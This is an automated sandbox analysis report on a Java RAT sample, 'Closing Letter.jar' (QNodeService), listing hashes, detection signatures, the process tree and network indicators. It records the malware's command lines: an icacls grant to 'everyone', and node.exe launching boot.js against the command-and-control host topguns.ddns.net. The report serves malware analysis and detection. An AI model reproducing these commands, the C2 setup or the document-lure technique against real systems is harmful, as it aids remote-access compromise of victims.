Loading ...

Play interactive tourEdit tour

Analysis Report Closing Letter.jar

Overview

General Information

Sample Name:Closing Letter.jar
Analysis ID:302849
MD5:831b760ab36e475c75edf3995058c835
SHA1:6cd5e4ea8b9c1649d4e0e4f2a69ef77456f5048a
SHA256:397a2d60c33dfdcd5cc56ae22b22989f31c154ced6547d9f1487ae02a1dc30db
Tags:jarQNodeServiceRAT

Most interesting Screenshot:

Detection

QNodeService
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected QNodeService
Exploit detected, runtime environment starts unknown processes
Uses dynamic DNS services
Yara detected Allatori_JAR_Obfuscator
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches a Java Jar file from a suspicious file location
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • cmd.exe (PID: 6148 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar'' >> C:\cmdlinestart.log 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • java.exe (PID: 4240 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar' MD5: 28733BA8C383E865338638DF5196E6FE)
      • icacls.exe (PID: 6992 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • javaw.exe (PID: 6900 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmp MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
        • node.exe (PID: 4968 cmdline: C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net MD5: F0B11A5823C45FC2664E116DC0323BCB)
          • conhost.exe (PID: 1320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • node.exe (PID: 6028 cmdline: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net MD5: F0B11A5823C45FC2664E116DC0323BCB)
            • node.exe (PID: 5328 cmdline: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net MD5: F0B11A5823C45FC2664E116DC0323BCB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Closing Letter.jarJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\28fda05a.tmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000007.00000003.674948698.00000000025E1000.00000004.00000001.sdmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
        00000007.00000002.912897413.0000000002958000.00000004.00000001.sdmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
          00000002.00000002.707554230.00000000031B8000.00000004.00000001.sdmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
            00000002.00000002.707993632.000000000548C000.00000004.00000001.sdmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
              00000002.00000003.653167812.0000000002DD1000.00000004.00000001.sdmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
                Click to see the 3 entries

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeFile opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTEJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeFile opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.jsJump to behavior

                Software Vulnerabilities:

                barindex
                Exploit detected, runtime environment starts unknown processesShow sources
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to behavior

                Networking:

                barindex
                Uses dynamic DNS servicesShow sources
                Source: unknownDNS query: name: topguns.ddns.net
                Source: Joe Sandbox ViewIP Address: 193.228.91.12 193.228.91.12
                Source: Joe Sandbox ViewIP Address: 104.20.23.46 104.20.23.46
                Source: Joe Sandbox ViewASN Name: REBECCAHOSTUS REBECCAHOSTUS
                Source: Joe Sandbox ViewJA3 fingerprint: d2935c58fe676744fecc8614ee5356c7
                Source: unknownDNS traffic detected: queries for: nodejs.org
                Source: java.exe, 00000002.00000002.709063871.000000000A9C0000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.918652198.000000000A1BD000.00000004.00000001.sdmpString found in binary or memory: http://bugreport.sun.com/bugreport/
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                Source: java.exe, 00000002.00000002.709099121.000000000A9D0000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.918691155.000000000A1C9000.00000004.00000001.sdmpString found in binary or memory: http://java.oracle.com/
                Source: javaw.exe, 00000007.00000002.936544095.000000001696B000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.926957064.00000000150E6000.00000004.00000001.sdmpString found in binary or memory: http://null.oracle.com/
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0#
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://policy.camerfirma.com0
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
                Source: javaw.exe, 00000007.00000003.674948698.00000000025E1000.00000004.00000001.sdmpString found in binary or memory: http://www.allatori.com
                Source: java.exe, 00000002.00000002.720781521.00000000164D0000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.931142684.0000000015C88000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                Source: node.exe, 00000013.00000002.951812248.00007FF64CE07000.00000002.00020000.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
                Source: node.exe, 00000010.00000003.822183414.000001AB67737000.00000004.00000001.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=6593
                Source: node.exe, 00000010.00000003.822183414.000001AB67737000.00000004.00000001.sdmpString found in binary or memory: https://github.com/v8/v8/blob/d6ead37d265d7215cf9c5f768f279e21bd170212/src/js/prologue.js#L152-L156
                Source: java.exe, 00000002.00000002.709137697.000000000AA07000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.918691155.000000000A1C9000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: https://nodejs.org/dist/v14.12.0/
                Source: javaw.exe, 00000007.00000002.936026786.0000000016840000.00000004.00000001.sdmpString found in binary or memory: https://nodejs.org/dist/v14.12.0/3FCA97F
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                Source: node.exe, 00000010.00000003.822183414.000001AB67737000.00000004.00000001.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess Stats: CPU usage > 98%
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_032DEC172_2_032DEC17
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC065847_3_0AC06584
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC065847_3_0AC06584
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC065847_3_0AC06584
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC065847_3_0AC06584
                Source: classification engineClassification label: mal60.troj.expl.evad.winJAR@15/1028@4/3
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1320:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_01
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: C:\Users\user\AppData\Local\Temp\hsperfdata_userJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeSection loaded: C:\Program Files (x86)\Java\jre1.8.0_211\bin\client\jvm.dllJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar'' >> C:\cmdlinestart.log 2>&1
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar'
                Source: unknownProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmp
                Source: unknownProcess created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net
                Source: unknownProcess created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar' Jump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)MJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmpJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.netJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeProcess created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.netJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior

                Data Obfuscation:

                barindex
                Yara detected Allatori_JAR_ObfuscatorShow sources
                Source: Yara matchFile source: Closing Letter.jar, type: SAMPLE
                Source: Yara matchFile source: 00000007.00000003.674948698.00000000025E1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.912897413.0000000002958000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.707554230.00000000031B8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.707993632.000000000548C000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.653167812.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: java.exe PID: 4240, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: javaw.exe PID: 6900, type: MEMORY
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\28fda05a.tmp, type: DROPPED
                Source: Java tracingExecutes: java.lang.ProcessBuilder(java.util.List) on c:\program files (x86)\java\jre1.8.0_211\bin\javaw.exe -javaagent:"c:\users\user\appdata\local\temp\jartracer.jar" -jar c:\users\user\appdata\local\temp\28fda05a.tmp
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_0323D877 push 00000000h; mov dword ptr [esp], esp2_2_0323D8A1
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_0323BB27 push 00000000h; mov dword ptr [esp], esp2_2_0323BB4D
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_0323B377 push 00000000h; mov dword ptr [esp], esp2_2_0323B39D
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_0323B907 push 00000000h; mov dword ptr [esp], esp2_2_0323B92D
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_0323A1CA push ecx; ret 2_2_0323A1DA
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_0323A1DB push ecx; ret 2_2_0323A1E5
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_0323D860 push 00000000h; mov dword ptr [esp], esp2_2_0323D8A1
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_03242D44 push eax; retf 2_2_03242D45
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_0323C437 push 00000000h; mov dword ptr [esp], esp2_2_0323C45D
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_032D9751 push cs; retf 2_2_032D9771
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC03B42 push eax; iretd 7_3_0AC03B69
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC03B42 push eax; iretd 7_3_0AC03B69
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC02957 push eax; iretd 7_3_0AC02A29
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC02957 push eax; iretd 7_3_0AC02A29
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC00427 push eax; iretd 7_3_0AC00441
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC00427 push eax; iretd 7_3_0AC00441
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC02A30 push eax; iretd 7_3_0AC02A29
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC02A30 push eax; iretd 7_3_0AC02A29
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC03B42 push eax; iretd 7_3_0AC03B69
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC03B42 push eax; iretd 7_3_0AC03B69
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC02957 push eax; iretd 7_3_0AC02A29
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC02957 push eax; iretd 7_3_0AC02A29
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC00427 push eax; iretd 7_3_0AC00441
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC00427 push eax; iretd 7_3_0AC00441
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC02A30 push eax; iretd 7_3_0AC02A29
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 7_3_0AC02A30 push eax; iretd 7_3_0AC02A29
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile created: C:\Users\user\node-v14.12.0-win-x64.tmp326058425756\node-v14.12.0-win-x64\node.exeJump to dropped file
                Source: unknownProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeFile opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTEJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeFile opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.jsJump to behavior
                Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: java.exe, 00000002.00000002.707500483.0000000003130000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.912762157.00000000028D0000.00000004.00000001.sdmpBinary or memory string: ,java/lang/VirtualMachineError
                Source: java.exe, 00000002.00000002.707500483.0000000003130000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.912762157.00000000028D0000.00000004.00000001.sdmpBinary or memory string: |[Ljava/lang/VirtualMachineError;
                Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_03230632 LdrInitializeThunk,2_2_03230632
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeMemory protected: page read and write | page guardJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar' Jump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)MJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmpJump to behavior
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.netJump to behavior
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeProcess created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.netJump to behavior
                Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_03230380 cpuid 2_2_03230380
                Source: C:\Users\user\node-v14.12.0-win-x64\node.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js VolumeInformationJump to behavior
